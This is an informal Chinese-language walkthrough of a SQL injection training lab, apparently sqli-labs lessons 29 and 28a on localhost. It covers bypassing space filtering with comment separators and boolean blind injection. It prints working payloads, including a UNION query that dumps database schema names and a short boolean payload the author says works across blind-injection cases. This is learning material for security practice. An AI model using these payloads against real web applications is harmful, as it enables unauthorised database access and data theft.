Lesson-29

明注-,-替换空格-,-Bool盲注

这道题发现页面中会显示出GET过去的参数 不过好像没有URL解码... 好奇怪 , 感觉好像是传过去之后又被编码了 , 还没有看源码 , 暂时不能确定 这样的话 , 说明执行的SQL语句就是URL编码以后的 , 这样肯定是不行的

用Burp抓包重放试试

后记 : URL编码过滤了空格等等特殊字符 , 可以通过这样验证存在注入点

http://127.0.0.1/Less-29/?id=0'union/**/select/**/1,1,1/**/--+
http://127.0.0.1/Less-29/?id=0%27union/**/select/**/1,group_concat(schema_name),1/**/from/**/information_schema.schemata--+
这样就可以dump数据了

后记 :

还是可以利用前面的Payload通杀盲注
http://127.0.0.1/Less-28a/?id=0%27%20or()or%20%27%27=%271
后来发现这个Payload还可以简化
在mysql中也有弱类型机制 , '0' 和 '1' 可以分别表示假和真
简化后 :
?id=0'||()||'0

Last updated